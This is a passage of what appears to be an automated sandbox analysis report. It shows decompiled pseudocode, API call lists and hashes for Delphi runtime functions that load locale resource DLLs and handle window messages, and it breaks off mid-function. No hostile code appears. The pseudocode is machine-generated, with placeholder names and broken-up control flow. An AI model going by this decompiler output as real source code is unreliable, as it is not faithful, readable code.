                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                  • Instruction ID: dbb6071de25c8a600b18edfe1c75d2887b874fa438560ba4d7020d93dc6c19fc
                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                  • Instruction Fuzzy Hash: 7E918B71D0020AEFDF65CF98C8456AEBBB6FB85309F30846FD405A6591F7304A81CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Executed Functions

                                  C-Code - Quality: 65%
                                  			E00405C7C(intOrPtr __eax) {
                                  				intOrPtr _v8;
                                  				void* _v12;
                                  				char _v15;
                                  				char _v17;
                                  				char _v18;
                                  				char _v22;
                                  				int _v28;
                                  				char* _v32;
                                  				char _v293;
                                  				long _t58;
                                  				long _t75;
                                  				long _t77;
                                  				CHAR* _t84;
                                  				CHAR* _t87;
                                  				struct HINSTANCE__* _t94;
                                  				struct HINSTANCE__* _t101;
                                  				struct HINSTANCE__* _t110;
                                  				intOrPtr _t115;
                                  				void* _t124;
                                  				void* _t126;
                                  				intOrPtr _t127;
                                  
                                  				_t124 = _t126;
                                  				_t127 = _t126 + 0xfffffedc;
                                  				_v8 = __eax;
                                  				GetModuleFileNameA(0,  &_v293, 0x105);
                                  				_v22 = 0;
                                  				_t58 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                  				if(_t58 == 0) {
                                  					L3:
                                  					_push(_t124);
                                  					_push(0x405d80);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t127;
                                  					_v28 = 5;
                                  					E00405AA4( &_v293, 0x105);
                                  					if(RegQueryValueExA(_v12,  &_v293, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405EFC, 0, 0,  &_v22,  &_v28) != 0) {
                                  						_v22 = 0;
                                  					}
                                  					_v18 = 0;
                                  					_pop(_t115);
                                  					 *[fs:eax] = _t115;
                                  					_push(E00405D87);
                                  					return RegCloseKey(_v12);
                                  				} else {
                                  					_t75 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                  					if(_t75 == 0) {
                                  						goto L3;
                                  					} else {
                                  						_t77 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                  						if(_t77 != 0) {
                                  							_push(0x105);
                                  							_push(_v8);
                                  							_push( &_v293);
                                  							L00401350();
                                  							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                                  							_t110 = 0;
                                  							if(_v293 != 0 && (_v17 != 0 || _v22 != 0)) {
                                  								_t84 =  &_v293;
                                  								_push(_t84);
                                  								L00401358();
                                  								_v32 = _t84 +  &_v293;
                                  								while( *_v32 != 0x2e &&  &_v293 != _v32) {
                                  									_v32 = _v32 - 1;
                                  								}
                                  								_t87 =  &_v293;
                                  								if(_t87 != _v32) {
                                  									_v32 = _v32 + 1;
                                  									if(_v22 != 0) {
                                  										_push(0x105 - _v32 - _t87);
                                  										_push( &_v22);
                                  										_push(_v32);
                                  										L00401350();
                                  										_t110 = LoadLibraryExA( &_v293, 0, 2);
                                  									}
                                  									if(_t110 == 0 && _v17 != 0) {
                                  										_push(0x105 - _v32 -  &_v293);
                                  										_push( &_v17);
                                  										_push(_v32);
                                  										L00401350();
                                  										_t94 = LoadLibraryExA( &_v293, 0, 2); // executed
                                  										_t110 = _t94;
                                  										if(_t110 == 0) {
                                  											_v15 = 0;
                                  											_push(0x105 - _v32 -  &_v293);
                                  											_push( &_v17);
                                  											_push(_v32);
                                  											L00401350();
                                  											_t101 = LoadLibraryExA( &_v293, 0, 2); // executed
                                  											_t110 = _t101;
                                  										}
                                  									}
                                  								}
                                  							}
                                  							return _t110;
                                  						} else {
                                  							goto L3;
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,004A00A4), ref: 00405C97
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405CB5
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405CD3
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CF1
                                  • RegQueryValueExA.ADVAPI32 ref: 00405D3A
                                  • RegQueryValueExA.ADVAPI32 ref: 00405D58
                                  • RegCloseKey.ADVAPI32(?), ref: 00405D7A
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D97
                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA4
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DAA
                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD5
                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E2A
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E3A
                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E66
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E76
                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00405EA0
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 00405EB0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1759228003-2375825460
                                  • Opcode ID: c16b275fc0c024c28089fba46fe3dc127163d86ee6490ba1d6328cb7c663bdf2
                                  • Instruction ID: a5fbd762a9c0376b77a18339bd1da6d2248b2361ced8cd3053c0c48bd3aa9a6e
                                  • Opcode Fuzzy Hash: c16b275fc0c024c28089fba46fe3dc127163d86ee6490ba1d6328cb7c663bdf2
                                  • Instruction Fuzzy Hash: 53613D71A046097EEB14DAE4CC46FEF77BCDB48704F5040A6BA45F25C1D6B89A448FA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E00466698(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
                                  				struct HWND__* _v8;
                                  				struct HWND__* _v12;
                                  				struct HWND__* _v16;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t161;
                                  				struct HWND__* _t162;
                                  				struct HWND__* _t163;
                                  				struct HWND__* _t176;
                                  				struct HWND__* _t185;
                                  				struct HWND__* _t188;
                                  				struct HWND__* _t189;
                                  				struct HWND__* _t191;
                                  				struct HWND__* _t197;
                                  				struct HWND__* _t199;
                                  				struct HWND__* _t202;
                                  				struct HWND__* _t205;
                                  				struct HWND__* _t206;
                                  				struct HWND__* _t216;
                                  				struct HWND__* _t217;
                                  				struct HWND__* _t222;
                                  				struct HWND__* _t224;
                                  				struct HWND__* _t227;
                                  				struct HWND__* _t231;
                                  				struct HWND__* _t239;
                                  				struct HWND__* _t247;
                                  				struct HWND__* _t250;
                                  				struct HWND__* _t254;
                                  				struct HWND__* _t256;
                                  				struct HWND__* _t257;
                                  				struct HWND__* _t269;
                                  				intOrPtr _t272;
                                  				struct HWND__* _t275;
                                  				intOrPtr* _t276;
                                  				struct HWND__* _t284;
                                  				struct HWND__* _t286;
                                  				struct HWND__* _t297;
                                  				void* _t305;
                                  				signed int _t307;
                                  				struct HWND__* _t312;
                                  				struct HWND__* _t313;
                                  				struct HWND__* _t314;
                                  				void* _t315;
                                  				intOrPtr _t336;
                                  				struct HWND__* _t340;
                                  				intOrPtr _t362;
                                  				void* _t364;
                                  				void* _t368;
                                  				void* _t369;
                                  				intOrPtr _t370;
                                  
                                  				_t315 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_push(_t369);
                                  				_push(0x466d4f);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t370;
                                  				 *(_v12 + 0xc) = 0;
                                  				_t305 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
                                  				if(_t305 < 0) {
                                  					L5:
                                  					E0046654C(_v8, _t315, _v12);
                                  					_t307 =  *_v12;
                                  					_t161 = _t307;
                                  					__eflags = _t161 - 0x53;
                                  					if(__eflags > 0) {
                                  						__eflags = _t161 - 0xb017;
                                  						if(__eflags > 0) {
                                  							__eflags = _t161 - 0xb020;
                                  							if(__eflags > 0) {
                                  								_t162 = _t161 - 0xb031;
                                  								__eflags = _t162;
                                  								if(_t162 == 0) {
                                  									_t163 = _v12;
                                  									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
                                  									if( *((intOrPtr*)(_t163 + 4)) != 1) {
                                  										 *(_v8 + 0xb0) =  *(_v12 + 8);
                                  									} else {
                                  										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
                                  									}
                                  									L102:
                                  									_pop(_t336);
                                  									 *[fs:eax] = _t336;
                                  									return 0;
                                  								}
                                  								__eflags = _t162 + 0xfffffff2 - 2;
                                  								if(_t162 + 0xfffffff2 - 2 < 0) {
                                  									 *(_v12 + 0xc) = E004687DC(_v8,  *(_v12 + 8), _t307) & 0x0000007f;
                                  								} else {
                                  									L101:
                                  									E00466610(_t369); // executed
                                  								}
                                  								goto L102;
                                  							}
                                  							if(__eflags == 0) {
                                  								_t176 = _v12;
                                  								__eflags =  *(_t176 + 4);
                                  								if( *(_t176 + 4) != 0) {
                                  									E004672E8(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                  								} else {
                                  									E0046728C(_v8, _t315,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                  								}
                                  								goto L102;
                                  							}
                                  							_t185 = _t161 - 0xb01a;
                                  							__eflags = _t185;
                                  							if(_t185 == 0) {
                                  								_t188 = IsIconic( *(_v8 + 0x30));
                                  								__eflags = _t188;
                                  								if(_t188 == 0) {
                                  									_t189 = GetFocus();
                                  									_t340 = _v8;
                                  									__eflags = _t189 -  *((intOrPtr*)(_t340 + 0x30));
                                  									if(_t189 ==  *((intOrPtr*)(_t340 + 0x30))) {
                                  										_t191 = E0045E3A4(0);
                                  										__eflags = _t191;
                                  										if(_t191 != 0) {
                                  											SetFocus(_t191);
                                  										}
                                  									}
                                  								}
                                  								goto L102;
                                  							}
                                  							__eflags = _t185 == 5;
                                  							if(_t185 == 5) {
                                  								L89:
                                  								E004677DC(_v8,  *(_v12 + 8),  *(_v12 + 4));
                                  								goto L102;
                                  							} else {
                                  								goto L101;
                                  							}
                                  						}
                                  						if(__eflags == 0) {
                                  							_t197 =  *(_v8 + 0x44);
                                  							__eflags = _t197;
                                  							if(_t197 != 0) {
                                  								_t365 = _t197;
                                  								_t199 = E0044D590(_t197);
                                  								__eflags = _t199;
                                  								if(_t199 != 0) {
                                  									_t202 = IsWindowEnabled(E0044D590(_t365));
                                  									__eflags = _t202;
                                  									if(_t202 != 0) {
                                  										_t205 = IsWindowVisible(E0044D590(_t365));
                                  										__eflags = _t205;
                                  										if(_t205 != 0) {
                                  											 *0x4a0f34 = 0;
                                  											_t206 = GetFocus();
                                  											SetFocus(E0044D590(_t365));
                                  											E00447F3C(_t365,  *(_v12 + 4), 0x112,  *(_v12 + 8));
                                  											SetFocus(_t206);
                                  											 *0x4a0f34 = 1;
                                  											 *(_v12 + 0xc) = 1;
                                  										}
                                  									}
                                  								}
                                  							}
                                  							goto L102;
                                  						}
                                  						__eflags = _t161 - 0xb000;
                                  						if(__eflags > 0) {
                                  							_t216 = _t161 - 0xb001;
                                  							__eflags = _t216;
                                  							if(_t216 == 0) {
                                  								_t217 = _v8;
                                  								__eflags =  *((short*)(_t217 + 0x10a));
                                  								if( *((short*)(_t217 + 0x10a)) != 0) {
                                  									 *((intOrPtr*)(_v8 + 0x108))();
                                  								}
                                  								goto L102;
                                  							}
                                  							__eflags = _t216 == 0x15;
                                  							if(_t216 == 0x15) {
                                  								_t222 = E0046714C(_v8, _t315, _v12);
                                  								__eflags = _t222;
                                  								if(_t222 != 0) {
                                  									 *(_v12 + 0xc) = 1;
                                  								}
                                  								goto L102;
                                  							} else {
                                  								goto L101;
                                  							}
                                  						}
                                  						if(__eflags == 0) {
                                  							_t224 = _v8;
                                  							__eflags =  *((short*)(_t224 + 0x112));
                                  							if( *((short*)(_t224 + 0x112)) != 0) {
                                  								 *((intOrPtr*)(_v8 + 0x110))();
                                  							}
                                  							goto L102;
                                  						}
                                  						_t227 = _t161 - 0x112;
                                  						__eflags = _t227;
                                  						if(_t227 == 0) {
                                  							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
                                  							__eflags = _t231;
                                  							if(_t231 == 0) {
                                  								E00466DB4(_v8);
                                  							} else {
                                  								__eflags = _t231 == 0x100;
                                  								if(_t231 == 0x100) {
                                  									E00466E64(_v8);
                                  								} else {
                                  									E00466610(_t369);
                                  								}
                                  							}
                                  							goto L102;
                                  						}
                                  						_t239 = _t227 + 0xffffffe0 - 7;
                                  						__eflags = _t239;
                                  						if(_t239 < 0) {
                                  							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t307 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
                                  							goto L102;
                                  						}
                                  						__eflags = _t239 == 0x1e1;
                                  						if(_t239 == 0x1e1) {
                                  							_t247 = E0043373C(E00433634());
                                  							__eflags = _t247;
                                  							if(_t247 != 0) {
                                  								E00433798(E00433634());
                                  							}
                                  							goto L102;
                                  						} else {
                                  							goto L101;
                                  						}
                                  					}
                                  					if(__eflags == 0) {
                                  						goto L89;
                                  					}
                                  					__eflags = _t161 - 0x16;
                                  					if(__eflags > 0) {
                                  						__eflags = _t161 - 0x1d;
                                  						if(__eflags > 0) {
                                  							_t250 = _t161 - 0x37;
                                  							__eflags = _t250;
                                  							if(_t250 == 0) {
                                  								 *(_v12 + 0xc) = E00466D98(_v8);
                                  								goto L102;
                                  							}
                                  							__eflags = _t250 == 0x13;
                                  							if(_t250 == 0x13) {
                                  								_t254 = _v12;
                                  								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
                                  								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
                                  									_t256 = _v8;
                                  									__eflags =  *((char*)(_t256 + 0x9e));
                                  									if( *((char*)(_t256 + 0x9e)) != 0) {
                                  										_t257 = _v8;
                                  										__eflags =  *(_t257 + 0xa0);
                                  										if( *(_t257 + 0xa0) != 0) {
                                  											 *(_v12 + 0xc) = 0;
                                  										} else {
                                  											_t312 = E0040E964("vcltest3.dll", _t307, 0x8000);
                                  											 *(_v8 + 0xa0) = _t312;
                                  											__eflags = _t312;
                                  											if(_t312 == 0) {
                                  												 *(_v12 + 0xc) = GetLastError();
                                  												 *(_v8 + 0xa0) = 0;
                                  											} else {
                                  												 *(_v12 + 0xc) = 0;
                                  												_t313 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
                                  												_v16 = _t313;
                                  												__eflags = _t313;
                                  												if(_t313 != 0) {
                                  													_t269 =  *(_v12 + 8);
                                  													_v16( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L102;
                                  							} else {
                                  								goto L101;
                                  							}
                                  						}
                                  						if(__eflags == 0) {
                                  							_t272 =  *0x4bcb80; // 0x1c40e90
                                  							E00465AE0(_t272);
                                  							E00466610(_t369);
                                  							goto L102;
                                  						}
                                  						_t275 = _t161 - 0x1a;
                                  						__eflags = _t275;
                                  						if(_t275 == 0) {
                                  							_t276 =  *0x4bb1d8; // 0x4bcadc
                                  							E00451FA8( *_t276, _t315,  *(_v12 + 4));
                                  							E004665A4(_v8, _t307, _t315, _v12, _t364);
                                  							E00466610(_t369);
                                  							goto L102;
                                  						}
                                  						__eflags = _t275 == 2;
                                  						if(_t275 == 2) {
                                  							E00466610(_t369);
                                  							_t284 = _v12;
                                  							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
                                  							asm("sbb eax, eax");
                                  							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
                                  							_t286 = _v12;
                                  							__eflags =  *(_t286 + 4);
                                  							if( *(_t286 + 4) == 0) {
                                  								E004664A0();
                                  								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
                                  							} else {
                                  								E004664B0(_v8);
                                  								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
                                  							}
                                  							goto L102;
                                  						} else {
                                  							goto L101;
                                  						}
                                  					}
                                  					if(__eflags == 0) {
                                  						_t297 = _v12;
                                  						__eflags =  *(_t297 + 4);
                                  						if( *(_t297 + 4) != 0) {
                                  							E004042E0();
                                  						}
                                  						goto L102;
                                  					}
                                  					__eflags = _t161 - 0x14;
                                  					if(_t161 > 0x14) {
                                  						goto L101;
                                  					}
                                  					switch( *((intOrPtr*)(_t161 * 4 +  &M0046673C))) {
                                  						case 0:
                                  							0 = E00424E18(0, __ebx, __edi, __esi);
                                  							goto L102;
                                  						case 1:
                                  							goto L101;
                                  						case 2:
                                  							_push(0);
                                  							_push(0);
                                  							_push(0xb01a);
                                  							_v8 =  *(_v8 + 0x30);
                                  							_push( *(_v8 + 0x30));
                                  							L0040736C();
                                  							__eax = E00466610(__ebp);
                                  							goto L102;
                                  						case 3:
                                  							__eax = _v12;
                                  							__eflags =  *(__eax + 4);
                                  							if( *(__eax + 4) == 0) {
                                  								__eax = E00466610(__ebp);
                                  								__eax = _v8;
                                  								__eflags =  *(__eax + 0xac);
                                  								if( *(__eax + 0xac) == 0) {
                                  									__eax = _v8;
                                  									__eax =  *(_v8 + 0x30);
                                  									__eax = E0045E23C( *(_v8 + 0x30), __ebx, __edi, __esi);
                                  									__edx = _v8;
                                  									 *(_v8 + 0xac) = __eax;
                                  								}
                                  								_v8 = L004664A8();
                                  							} else {
                                  								_v8 = E004664B0(_v8);
                                  								__eax = _v8;
                                  								__eax =  *(_v8 + 0xac);
                                  								__eflags = __eax;
                                  								if(__eax != 0) {
                                  									__eax = _v8;
                                  									__edx = 0;
                                  									__eflags = 0;
                                  									 *(_v8 + 0xac) = 0;
                                  								}
                                  								__eax = E00466610(__ebp);
                                  							}
                                  							goto L102;
                                  						case 4:
                                  							__eax = _v8;
                                  							__eax =  *(_v8 + 0x30);
                                  							_push(__eax);
                                  							L004072CC();
                                  							__eflags = __eax;
                                  							if(__eax == 0) {
                                  								__eax = E00466610(__ebp);
                                  							} else {
                                  								__eax = E0046664C(__ebp);
                                  							}
                                  							goto L102;
                                  						case 5:
                                  							__eax = _v8;
                                  							__eax =  *(_v8 + 0x44);
                                  							__eflags = __eax;
                                  							if(__eax != 0) {
                                  								__eax = E00463C6C(__eax, __ecx);
                                  							}
                                  							goto L102;
                                  						case 6:
                                  							__eax = _v12;
                                  							 *_v12 = 0x27;
                                  							__eax = E00466610(__ebp);
                                  							goto L102;
                                  					}
                                  				} else {
                                  					_t314 = _t305 + 1;
                                  					_t368 = 0;
                                  					do {
                                  						if( *((intOrPtr*)(E0041C834( *((intOrPtr*)(_v8 + 0xa8)), _t315, _t368)))() != 0) {
                                  							_pop(_t362);
                                  							 *[fs:eax] = _t362;
                                  							return 0;
                                  						}
                                  						_t368 = _t368 + 1;
                                  						_t314 = _t314 - 1;
                                  						__eflags = _t314;
                                  					} while (_t314 != 0);
                                  					goto L5;
                                  				}
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: RegisterAutomation$vcltest3.dll
                                  • API String ID: 0-2963190186
                                  • Opcode ID: b6c7edd36508b99548b432208c35770ba76f4e7e018f4cbead578545e214f181
                                  • Instruction ID: 9f100de1b60680ee6c751446b834187cece7d860d5bbae6ffedc49d3f7f3c67a
                                  • Opcode Fuzzy Hash: b6c7edd36508b99548b432208c35770ba76f4e7e018f4cbead578545e214f181
                                  • Instruction Fuzzy Hash: BCE17134B04204EFDB50DFA9C585A5EB7B4AF04314F1681A7E8449B356EB38EE41DB4B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E00405D87() {
                                  				void* _t42;
                                  				void* _t45;
                                  				struct HINSTANCE__* _t52;
                                  				struct HINSTANCE__* _t59;
                                  				struct HINSTANCE__* _t67;
                                  				void* _t76;
                                  
                                  				_push(0x105);
                                  				_push( *((intOrPtr*)(_t76 - 4)));
                                  				_push(_t76 - 0x121);
                                  				L00401350();
                                  				GetLocaleInfoA(GetThreadLocale(), 3, _t76 - 0xd, 5); // executed
                                  				_t67 = 0;
                                  				if( *(_t76 - 0x121) == 0 ||  *(_t76 - 0xd) == 0 &&  *((char*)(_t76 - 0x12)) == 0) {
                                  					L14:
                                  					return _t67;
                                  				} else {
                                  					_t42 = _t76 - 0x121;
                                  					_push(_t42);
                                  					L00401358();
                                  					 *((intOrPtr*)(_t76 - 0x1c)) = _t42 + _t76 - 0x121;
                                  					L5:
                                  					if( *((char*)( *((intOrPtr*)(_t76 - 0x1c)))) != 0x2e && _t76 - 0x121 !=  *((intOrPtr*)(_t76 - 0x1c))) {
                                  						 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) - 1;
                                  						goto L5;
                                  					}
                                  					_t45 = _t76 - 0x121;
                                  					if(_t45 !=  *((intOrPtr*)(_t76 - 0x1c))) {
                                  						 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) + 1;
                                  						if( *((char*)(_t76 - 0x12)) != 0) {
                                  							_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t45);
                                  							_push(_t76 - 0x12);
                                  							_push( *((intOrPtr*)(_t76 - 0x1c)));
                                  							L00401350();
                                  							_t67 = LoadLibraryExA(_t76 - 0x121, 0, 2);
                                  						}
                                  						if(_t67 == 0 &&  *(_t76 - 0xd) != 0) {
                                  							_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t76 - 0x121);
                                  							_push(_t76 - 0xd);
                                  							_push( *((intOrPtr*)(_t76 - 0x1c)));
                                  							L00401350();
                                  							_t52 = LoadLibraryExA(_t76 - 0x121, 0, 2); // executed
                                  							_t67 = _t52;
                                  							if(_t67 == 0) {
                                  								 *((char*)(_t76 - 0xb)) = 0;
                                  								_push(0x105 -  *((intOrPtr*)(_t76 - 0x1c)) - _t76 - 0x121);
                                  								_push(_t76 - 0xd);
                                  								_push( *((intOrPtr*)(_t76 - 0x1c)));
                                  								L00401350();
                                  								_t59 = LoadLibraryExA(_t76 - 0x121, 0, 2); // executed
                                  								_t67 = _t59;
                                  							}
                                  						}
                                  					}
                                  					goto L14;
                                  				}
                                  			}

                                  APIs
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D97
                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA4
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DAA
                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD5
                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E2A
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E3A
                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E66
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E76
                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00405EA0
                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 00405EB0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1599918012-2375825460
                                  • Opcode ID: 4cafef0d05a7501c3ecb8cd799bf502a5d03e8f44119ef1033d53ecd9e50e5d6
                                  • Instruction ID: c6cc543f779af1b06d000f61bcb6ff01c81c68deff5b5284ae5dd448b00e11f2
                                  • Opcode Fuzzy Hash: 4cafef0d05a7501c3ecb8cd799bf502a5d03e8f44119ef1033d53ecd9e50e5d6
                                  • Instruction Fuzzy Hash: 5E315A71E002096EEB15DAE8C889BEFB7BCDB58304F0480A6A645F26C1D6BC9A458F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E0044AFA4(void* __eax, intOrPtr* __edx) {
                                  				char _v20;
                                  				char _v28;
                                  				void* __edi;
                                  				intOrPtr _t17;
                                  				void* _t19;
                                  				void* _t21;
                                  				void* _t23;
                                  				void* _t32;
                                  				void* _t39;
                                  				void* _t45;
                                  				intOrPtr _t47;
                                  				intOrPtr _t48;
                                  				void* _t50;
                                  				void* _t51;
                                  				void* _t65;
                                  				intOrPtr* _t66;
                                  				intOrPtr* _t68;
                                  				void* _t69;
                                  
                                  				_t68 = __edx;
                                  				_t50 = __eax;
                                  				_t17 =  *__edx;
                                  				_t69 = _t17 - 0x84;
                                  				if(_t69 > 0) {
                                  					_t19 = _t17 + 0xffffff00 - 9;
                                  					if(_t19 < 0) {
                                  						_t21 = E004474EC(__eax);
                                  						if(_t21 != 0) {
                                  							L28:
                                  							return _t21;
                                  						}
                                  						L27:
                                  						_t23 = E00448008(_t50, _t68); // executed
                                  						return _t23;
                                  					}
                                  					if(_t19 + 0xffffff09 - 0xb < 0) {
                                  						_t21 = E0044AF10(__eax, _t51, __edx);
                                  						if(_t21 == 0) {
                                  							goto L27;
                                  						}
                                  						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
                                  							goto L28;
